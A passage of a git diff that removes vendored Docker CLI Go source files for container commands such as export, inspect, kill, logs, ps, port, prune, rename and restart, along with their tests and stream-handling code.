-	"github.com/docker/docker/api/types"
-)
-
-type arguments struct {
-	options execOptions
-	execCmd []string
-}
-
-func TestParseExec(t *testing.T) {
-	valids := map[*arguments]*types.ExecConfig{
-		&arguments{
-			execCmd: []string{"command"},
-		}: {
-			Cmd:          []string{"command"},
-			AttachStdout: true,
-			AttachStderr: true,
-		},
-		&arguments{
-			execCmd: []string{"command1", "command2"},
-		}: {
-			Cmd:          []string{"command1", "command2"},
-			AttachStdout: true,
-			AttachStderr: true,
-		},
-		&arguments{
-			options: execOptions{
-				interactive: true,
-				tty:         true,
-				user:        "uid",
-			},
-			execCmd: []string{"command"},
-		}: {
-			User:         "uid",
-			AttachStdin:  true,
-			AttachStdout: true,
-			AttachStderr: true,
-			Tty:          true,
-			Cmd:          []string{"command"},
-		},
-		&arguments{
-			options: execOptions{
-				detach: true,
-			},
-			execCmd: []string{"command"},
-		}: {
-			AttachStdin:  false,
-			AttachStdout: false,
-			AttachStderr: false,
-			Detach:       true,
-			Cmd:          []string{"command"},
-		},
-		&arguments{
-			options: execOptions{
-				tty:         true,
-				interactive: true,
-				detach:      true,
-			},
-			execCmd: []string{"command"},
-		}: {
-			AttachStdin:  false,
-			AttachStdout: false,
-			AttachStderr: false,
-			Detach:       true,
-			Tty:          true,
-			Cmd:          []string{"command"},
-		},
-	}
-
-	for valid, expectedExecConfig := range valids {
-		execConfig, err := parseExec(&valid.options, valid.execCmd)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if !compareExecConfig(expectedExecConfig, execConfig) {
-			t.Fatalf("Expected [%v] for %v, got [%v]", expectedExecConfig, valid, execConfig)
-		}
-	}
-}
-
-func compareExecConfig(config1 *types.ExecConfig, config2 *types.ExecConfig) bool {
-	if config1.AttachStderr != config2.AttachStderr {
-		return false
-	}
-	if config1.AttachStdin != config2.AttachStdin {
-		return false
-	}
-	if config1.AttachStdout != config2.AttachStdout {
-		return false
-	}
-	if config1.Detach != config2.Detach {
-		return false
-	}
-	if config1.Privileged != config2.Privileged {
-		return false
-	}
-	if config1.Tty != config2.Tty {
-		return false
-	}
-	if config1.User != config2.User {
-		return false
-	}
-	if len(config1.Cmd) != len(config2.Cmd) {
-		return false
-	}
-	for index, value := range config1.Cmd {
-		if value != config2.Cmd[index] {
-			return false
-		}
-	}
-	return true
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/export.go b/vendor/github.com/docker/docker/cli/command/container/export.go
deleted file mode 100644
index 8fa2e5d77e..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/export.go
+++ /dev/null
@@ -1,59 +0,0 @@
-package container
-
-import (
-	"errors"
-	"io"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type exportOptions struct {
-	container string
-	output    string
-}
-
-// NewExportCommand creates a new `docker export` command
-func NewExportCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts exportOptions
-
-	cmd := &cobra.Command{
-		Use:   "export [OPTIONS] CONTAINER",
-		Short: "Export a container's filesystem as a tar archive",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			return runExport(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT")
-
-	return cmd
-}
-
-func runExport(dockerCli *command.DockerCli, opts exportOptions) error {
-	if opts.output == "" && dockerCli.Out().IsTerminal() {
-		return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.")
-	}
-
-	clnt := dockerCli.Client()
-
-	responseBody, err := clnt.ContainerExport(context.Background(), opts.container)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	if opts.output == "" {
-		_, err := io.Copy(dockerCli.Out(), responseBody)
-		return err
-	}
-
-	return command.CopyToFile(opts.output, responseBody)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/hijack.go b/vendor/github.com/docker/docker/cli/command/container/hijack.go
deleted file mode 100644
index ca136f0e43..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/hijack.go
+++ /dev/null
@@ -1,116 +0,0 @@
-package container
-
-import (
-	"io"
-	"runtime"
-	"sync"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/stdcopy"
-	"golang.org/x/net/context"
-)
-
-// holdHijackedConnection handles copying input to and output from streams to the
-// connection
-func holdHijackedConnection(ctx context.Context, streams command.Streams, tty bool, inputStream io.ReadCloser, outputStream, errorStream io.Writer, resp types.HijackedResponse) error {
-	var (
-		err         error
-		restoreOnce sync.Once
-	)
-	if inputStream != nil && tty {
-		if err := setRawTerminal(streams); err != nil {
-			return err
-		}
-		defer func() {
-			restoreOnce.Do(func() {
-				restoreTerminal(streams, inputStream)
-			})
-		}()
-	}
-
-	receiveStdout := make(chan error, 1)
-	if outputStream != nil || errorStream != nil {
-		go func() {
-			// When TTY is ON, use regular copy
-			if tty && outputStream != nil {
-				_, err = io.Copy(outputStream, resp.Reader)
-				// we should restore the terminal as soon as possible once connection end
-				// so any following print messages will be in normal type.
-				if inputStream != nil {
-					restoreOnce.Do(func() {
-						restoreTerminal(streams, inputStream)
-					})
-				}
-			} else {
-				_, err = stdcopy.StdCopy(outputStream, errorStream, resp.Reader)
-			}
-
-			logrus.Debug("[hijack] End of stdout")
-			receiveStdout <- err
-		}()
-	}
-
-	stdinDone := make(chan struct{})
-	go func() {
-		if inputStream != nil {
-			io.Copy(resp.Conn, inputStream)
-			// we should restore the terminal as soon as possible once connection end
-			// so any following print messages will be in normal type.
-			if tty {
-				restoreOnce.Do(func() {
-					restoreTerminal(streams, inputStream)
-				})
-			}
-			logrus.Debug("[hijack] End of stdin")
-		}
-
-		if err := resp.CloseWrite(); err != nil {
-			logrus.Debugf("Couldn't send EOF: %s", err)
-		}
-		close(stdinDone)
-	}()
-
-	select {
-	case err := <-receiveStdout:
-		if err != nil {
-			logrus.Debugf("Error receiveStdout: %s", err)
-			return err
-		}
-	case <-stdinDone:
-		if outputStream != nil || errorStream != nil {
-			select {
-			case err := <-receiveStdout:
-				if err != nil {
-					logrus.Debugf("Error receiveStdout: %s", err)
-					return err
-				}
-			case <-ctx.Done():
-			}
-		}
-	case <-ctx.Done():
-	}
-
-	return nil
-}
-
-func setRawTerminal(streams command.Streams) error {
-	if err := streams.In().SetRawTerminal(); err != nil {
-		return err
-	}
-	return streams.Out().SetRawTerminal()
-}
-
-func restoreTerminal(streams command.Streams, in io.Closer) error {
-	streams.In().RestoreTerminal()
-	streams.Out().RestoreTerminal()
-	// WARNING: DO NOT REMOVE THE OS CHECK !!!
-	// For some reason this Close call blocks on darwin..
-	// As the client exists right after, simply discard the close
-	// until we find a better solution.
-	if in != nil && runtime.GOOS != "darwin" {
-		return in.Close()
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/inspect.go b/vendor/github.com/docker/docker/cli/command/container/inspect.go
deleted file mode 100644
index 08a8d244df..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/inspect.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package container
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/spf13/cobra"
-)
-
-type inspectOptions struct {
-	format string
-	size   bool
-	refs   []string
-}
-
-// newInspectCommand creates a new cobra.Command for `docker container inspect`
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Display detailed information on one or more containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.refs = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes")
-
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	getRefFunc := func(ref string) (interface{}, []byte, error) {
-		return client.ContainerInspectWithRaw(ctx, ref, opts.size)
-	}
-	return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/kill.go b/vendor/github.com/docker/docker/cli/command/container/kill.go
deleted file mode 100644
index 6da91a40e3..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/kill.go
+++ /dev/null
@@ -1,56 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type killOptions struct {
-	signal string
-
-	containers []string
-}
-
-// NewKillCommand creates a new cobra.Command for `docker kill`
-func NewKillCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts killOptions
-
-	cmd := &cobra.Command{
-		Use:   "kill [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Kill one or more running containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runKill(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.signal, "signal", "s", "KILL", "Signal to send to the container")
-	return cmd
-}
-
-func runKill(dockerCli *command.DockerCli, opts *killOptions) error {
-	var errs []string
-	ctx := context.Background()
-	errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error {
-		return dockerCli.Client().ContainerKill(ctx, container, opts.signal)
-	})
-	for _, name := range opts.containers {
-		if err := <-errChan; err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", name)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/list.go b/vendor/github.com/docker/docker/cli/command/container/list.go
deleted file mode 100644
index 5bbf41966d..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/list.go
+++ /dev/null
@@ -1,141 +0,0 @@
-package container
-
-import (
-	"io/ioutil"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/utils/templates"
-	"github.com/spf13/cobra"
-)
-
-type psOptions struct {
-	quiet   bool
-	size    bool
-	all     bool
-	noTrunc bool
-	nLatest bool
-	last    int
-	format  string
-	filter  opts.FilterOpt
-}
-
-// NewPsCommand creates a new cobra.Command for `docker ps`
-func NewPsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := psOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "ps [OPTIONS]",
-		Short: "List containers",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runPs(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display numeric IDs")
-	flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes")
-	flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)")
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
-	flags.BoolVarP(&opts.nLatest, "latest", "l", false, "Show the latest created container (includes all states)")
-	flags.IntVarP(&opts.last, "last", "n", -1, "Show n last created containers (includes all states)")
-	flags.StringVarP(&opts.format, "format", "", "", "Pretty-print containers using a Go template")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := *NewPsCommand(dockerCli)
-	cmd.Aliases = []string{"ps", "list"}
-	cmd.Use = "ls [OPTIONS]"
-	return &cmd
-}
-
-// listOptionsProcessor is used to set any container list options which may only
-// be embedded in the format template.
-// This is passed directly into tmpl.Execute in order to allow the preprocessor
-// to set any list options that were not provided by flags (e.g. `.Size`).
-// It is using a `map[string]bool` so that unknown fields passed into the
-// template format do not cause errors. These errors will get picked up when
-// running through the actual template processor.
-type listOptionsProcessor map[string]bool
-
-// Size sets the size of the map when called by a template execution.
-func (o listOptionsProcessor) Size() bool {
-	o["size"] = true
-	return true
-}
-
-// Label is needed here as it allows the correct pre-processing
-// because Label() is a method with arguments
-func (o listOptionsProcessor) Label(name string) string {
-	return ""
-}
-
-func buildContainerListOptions(opts *psOptions) (*types.ContainerListOptions, error) {
-	options := &types.ContainerListOptions{
-		All:     opts.all,
-		Limit:   opts.last,
-		Size:    opts.size,
-		Filters: opts.filter.Value(),
-	}
-
-	if opts.nLatest && opts.last == -1 {
-		options.Limit = 1
-	}
-
-	tmpl, err := templates.Parse(opts.format)
-
-	if err != nil {
-		return nil, err
-	}
-
-	optionsProcessor := listOptionsProcessor{}
-	// This shouldn't error out but swallowing the error makes it harder
-	// to track down if preProcessor issues come up. Ref #24696
-	if err := tmpl.Execute(ioutil.Discard, optionsProcessor); err != nil {
-		return nil, err
-	}
-	// At the moment all we need is to capture .Size for preprocessor
-	options.Size = opts.size || optionsProcessor["size"]
-
-	return options, nil
-}
-
-func runPs(dockerCli *command.DockerCli, opts *psOptions) error {
-	ctx := context.Background()
-
-	listOptions, err := buildContainerListOptions(opts)
-	if err != nil {
-		return err
-	}
-
-	containers, err := dockerCli.Client().ContainerList(ctx, *listOptions)
-	if err != nil {
-		return err
-	}
-
-	format := opts.format
-	if len(format) == 0 {
-		if len(dockerCli.ConfigFile().PsFormat) > 0 && !opts.quiet {
-			format = dockerCli.ConfigFile().PsFormat
-		} else {
-			format = formatter.TableFormatKey
-		}
-	}
-
-	containerCtx := formatter.Context{
-		Output: dockerCli.Out(),
-		Format: formatter.NewContainerFormat(format, opts.quiet, listOptions.Size),
-		Trunc:  !opts.noTrunc,
-	}
-	return formatter.ContainerWrite(containerCtx, containers)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/logs.go b/vendor/github.com/docker/docker/cli/command/container/logs.go
deleted file mode 100644
index 3a37cedf43..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/logs.go
+++ /dev/null
@@ -1,87 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/stdcopy"
-	"github.com/spf13/cobra"
-)
-
-var validDrivers = map[string]bool{
-	"json-file": true,
-	"journald":  true,
-}
-
-type logsOptions struct {
-	follow     bool
-	since      string
-	timestamps bool
-	details    bool
-	tail       string
-
-	container string
-}
-
-// NewLogsCommand creates a new cobra.Command for `docker logs`
-func NewLogsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts logsOptions
-
-	cmd := &cobra.Command{
-		Use:   "logs [OPTIONS] CONTAINER",
-		Short: "Fetch the logs of a container",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			return runLogs(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output")
-	flags.StringVar(&opts.since, "since", "", "Show logs since timestamp")
-	flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps")
-	flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs")
-	flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs")
-	return cmd
-}
-
-func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error {
-	ctx := context.Background()
-
-	c, err := dockerCli.Client().ContainerInspect(ctx, opts.container)
-	if err != nil {
-		return err
-	}
-
-	if !validDrivers[c.HostConfig.LogConfig.Type] {
-		return fmt.Errorf("\"logs\" command is supported only for \"json-file\" and \"journald\" logging drivers (got: %s)", c.HostConfig.LogConfig.Type)
-	}
-
-	options := types.ContainerLogsOptions{
-		ShowStdout: true,
-		ShowStderr: true,
-		Since:      opts.since,
-		Timestamps: opts.timestamps,
-		Follow:     opts.follow,
-		Tail:       opts.tail,
-		Details:    opts.details,
-	}
-	responseBody, err := dockerCli.Client().ContainerLogs(ctx, opts.container, options)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	if c.Config.Tty {
-		_, err = io.Copy(dockerCli.Out(), responseBody)
-	} else {
-		_, err = stdcopy.StdCopy(dockerCli.Out(), dockerCli.Err(), responseBody)
-	}
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/pause.go b/vendor/github.com/docker/docker/cli/command/container/pause.go
deleted file mode 100644
index 6817cf60eb..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/pause.go
+++ /dev/null
@@ -1,49 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type pauseOptions struct {
-	containers []string
-}
-
-// NewPauseCommand creates a new cobra.Command for `docker pause`
-func NewPauseCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pauseOptions
-
-	return &cobra.Command{
-		Use:   "pause CONTAINER [CONTAINER...]",
-		Short: "Pause all processes within one or more containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runPause(dockerCli, &opts)
-		},
-	}
-}
-
-func runPause(dockerCli *command.DockerCli, opts *pauseOptions) error {
-	ctx := context.Background()
-
-	var errs []string
-	errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerPause)
-	for _, container := range opts.containers {
-		if err := <-errChan; err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/port.go b/vendor/github.com/docker/docker/cli/command/container/port.go
deleted file mode 100644
index ea15290145..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/port.go
+++ /dev/null
@@ -1,78 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/go-connections/nat"
-	"github.com/spf13/cobra"
-)
-
-type portOptions struct {
-	container string
-
-	port string
-}
-
-// NewPortCommand creates a new cobra.Command for `docker port`
-func NewPortCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts portOptions
-
-	cmd := &cobra.Command{
-		Use:   "port CONTAINER [PRIVATE_PORT[/PROTO]]",
-		Short: "List port mappings or a specific mapping for the container",
-		Args:  cli.RequiresRangeArgs(1, 2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			if len(args) > 1 {
-				opts.port = args[1]
-			}
-			return runPort(dockerCli, &opts)
-		},
-	}
-	return cmd
-}
-
-func runPort(dockerCli *command.DockerCli, opts *portOptions) error {
-	ctx := context.Background()
-
-	c, err := dockerCli.Client().ContainerInspect(ctx, opts.container)
-	if err != nil {
-		return err
-	}
-
-	if opts.port != "" {
-		port := opts.port
-		proto := "tcp"
-		parts := strings.SplitN(port, "/", 2)
-
-		if len(parts) == 2 && len(parts[1]) != 0 {
-			port = parts[0]
-			proto = parts[1]
-		}
-		natPort := port + "/" + proto
-		newP, err := nat.NewPort(proto, port)
-		if err != nil {
-			return err
-		}
-		if frontends, exists := c.NetworkSettings.Ports[newP]; exists && frontends != nil {
-			for _, frontend := range frontends {
-				fmt.Fprintf(dockerCli.Out(), "%s:%s\n", frontend.HostIP, frontend.HostPort)
-			}
-			return nil
-		}
-		return fmt.Errorf("Error: No public port '%s' published for %s", natPort, opts.container)
-	}
-
-	for from, frontends := range c.NetworkSettings.Ports {
-		for _, frontend := range frontends {
-			fmt.Fprintf(dockerCli.Out(), "%s -> %s:%s\n", from, frontend.HostIP, frontend.HostPort)
-		}
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/prune.go b/vendor/github.com/docker/docker/cli/command/container/prune.go
deleted file mode 100644
index 064f4c08e0..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/prune.go
+++ /dev/null
@@ -1,75 +0,0 @@
-package container
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	units "github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type pruneOptions struct {
-	force bool
-}
-
-// NewPruneCommand returns a new cobra prune command for containers
-func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pruneOptions
-
-	cmd := &cobra.Command{
-		Use:   "prune [OPTIONS]",
-		Short: "Remove all stopped containers",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			spaceReclaimed, output, err := runPrune(dockerCli, opts)
-			if err != nil {
-				return err
-			}
-			if output != "" {
-				fmt.Fprintln(dockerCli.Out(), output)
-			}
-			fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
-			return nil
-		},
-		Tags: map[string]string{"version": "1.25"},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
-
-	return cmd
-}
-
-const warning = `WARNING! This will remove all stopped containers.
-Are you sure you want to continue?`
-
-func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) {
-	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
-		return
-	}
-
-	report, err := dockerCli.Client().ContainersPrune(context.Background(), filters.Args{})
-	if err != nil {
-		return
-	}
-
-	if len(report.ContainersDeleted) > 0 {
-		output = "Deleted Containers:\n"
-		for _, id := range report.ContainersDeleted {
-			output += id + "\n"
-		}
-		spaceReclaimed = report.SpaceReclaimed
-	}
-
-	return
-}
-
-// RunPrune calls the Container Prune API
-// This returns the amount of space reclaimed and a detailed output string
-func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) {
-	return runPrune(dockerCli, pruneOptions{force: true})
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/ps_test.go b/vendor/github.com/docker/docker/cli/command/container/ps_test.go
deleted file mode 100644
index 62b0545274..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/ps_test.go
+++ /dev/null
@@ -1,118 +0,0 @@
-package container
-
-import (
-	"testing"
-
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestBuildContainerListOptions(t *testing.T) {
-	filters := opts.NewFilterOpt()
-	assert.NilError(t, filters.Set("foo=bar"))
-	assert.NilError(t, filters.Set("baz=foo"))
-
-	contexts := []struct {
-		psOpts          *psOptions
-		expectedAll     bool
-		expectedSize    bool
-		expectedLimit   int
-		expectedFilters map[string]string
-	}{
-		{
-			psOpts: &psOptions{
-				all:    true,
-				size:   true,
-				last:   5,
-				filter: filters,
-			},
-			expectedAll:   true,
-			expectedSize:  true,
-			expectedLimit: 5,
-			expectedFilters: map[string]string{
-				"foo": "bar",
-				"baz": "foo",
-			},
-		},
-		{
-			psOpts: &psOptions{
-				all:     true,
-				size:    true,
-				last:    -1,
-				nLatest: true,
-			},
-			expectedAll:     true,
-			expectedSize:    true,
-			expectedLimit:   1,
-			expectedFilters: make(map[string]string),
-		},
-		{
-			psOpts: &psOptions{
-				all:    true,
-				size:   false,
-				last:   5,
-				filter: filters,
-				// With .Size, size should be true
-				format: "{{.Size}}",
-			},
-			expectedAll:   true,
-			expectedSize:  true,
-			expectedLimit: 5,
-			expectedFilters: map[string]string{
-				"foo": "bar",
-				"baz": "foo",
-			},
-		},
-		{
-			psOpts: &psOptions{
-				all:    true,
-				size:   false,
-				last:   5,
-				filter: filters,
-				// With .Size, size should be true
-				format: "{{.Size}} {{.CreatedAt}} {{.Networks}}",
-			},
-			expectedAll:   true,
-			expectedSize:  true,
-			expectedLimit: 5,
-			expectedFilters: map[string]string{
-				"foo": "bar",
-				"baz": "foo",
-			},
-		},
-		{
-			psOpts: &psOptions{
-				all:    true,
-				size:   false,
-				last:   5,
-				filter: filters,
-				// Without .Size, size should be false
-				format: "{{.CreatedAt}} {{.Networks}}",
-			},
-			expectedAll:   true,
-			expectedSize:  false,
-			expectedLimit: 5,
-			expectedFilters: map[string]string{
-				"foo": "bar",
-				"baz": "foo",
-			},
-		},
-	}
-
-	for _, c := range contexts {
-		options, err := buildContainerListOptions(c.psOpts)
-		assert.NilError(t, err)
-
-		assert.Equal(t, c.expectedAll, options.All)
-		assert.Equal(t, c.expectedSize, options.Size)
-		assert.Equal(t, c.expectedLimit, options.Limit)
-		assert.Equal(t, options.Filters.Len(), len(c.expectedFilters))
-
-		for k, v := range c.expectedFilters {
-			f := options.Filters
-			if !f.ExactMatch(k, v) {
-				t.Fatalf("Expected filter with key %s to be %s but got %s", k, v, f.Get(k))
-			}
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/rename.go b/vendor/github.com/docker/docker/cli/command/container/rename.go
deleted file mode 100644
index 346fb7b3b9..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/rename.go
+++ /dev/null
@@ -1,51 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type renameOptions struct {
-	oldName string
-	newName string
-}
-
-// NewRenameCommand creates a new cobra.Command for `docker rename`
-func NewRenameCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts renameOptions
-
-	cmd := &cobra.Command{
-		Use:   "rename CONTAINER NEW_NAME",
-		Short: "Rename a container",
-		Args:  cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.oldName = args[0]
-			opts.newName = args[1]
-			return runRename(dockerCli, &opts)
-		},
-	}
-	return cmd
-}
-
-func runRename(dockerCli *command.DockerCli, opts *renameOptions) error {
-	ctx := context.Background()
-
-	oldName := strings.TrimSpace(opts.oldName)
-	newName := strings.TrimSpace(opts.newName)
-
-	if oldName == "" || newName == "" {
-		return fmt.Errorf("Error: Neither old nor new names may be empty")
-	}
-
-	if err := dockerCli.Client().ContainerRename(ctx, oldName, newName); err != nil {
-		fmt.Fprintf(dockerCli.Err(), "%s\n", err)
-		return fmt.Errorf("Error: failed to rename container named %s", oldName)
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/restart.go b/vendor/github.com/docker/docker/cli/command/container/restart.go
deleted file mode 100644
index fc3ba93c84..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/restart.go
+++ /dev/null
@@ -1,62 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type restartOptions struct {
-	nSeconds        int
-	nSecondsChanged bool
-
-	containers []string
-}
-
-// NewRestartCommand creates a new cobra.Command for `docker restart`
-func NewRestartCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts restartOptions
-
-	cmd := &cobra.Command{
-		Use:   "restart [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Restart one or more containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			opts.nSecondsChanged = cmd.Flags().Changed("time")
-			return runRestart(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.IntVarP(&opts.nSeconds, "time", "t", 10, "Seconds to wait for stop before killing the container")
-	return cmd
-}
-
-func runRestart(dockerCli *command.DockerCli, opts *restartOptions) error {
-	ctx := context.Background()
-	var errs []string
-	var timeout *time.Duration
-	if opts.nSecondsChanged {
-		timeoutValue := time.Duration(opts.nSeconds) * time.Second
-		timeout = &timeoutValue
-	}
-
-	for _, name := range opts.containers {
-		if err := dockerCli.Client().ContainerRestart(ctx, name, timeout); err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", name)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/rm.go b/vendor/github.com/docker/docker/cli/command/container/rm.go
deleted file mode 100644
index 60724f194b..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/rm.go
+++ /dev/null
@@ -1,73 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type rmOptions struct {
-	rmVolumes bool
-	rmLink    bool
-	force     bool
-
-	containers []string
-}
-
-// NewRmCommand creates a new cobra.Command for `docker rm`
-func NewRmCommand(dockerCli *command.DockerCli) *cobra.Command {
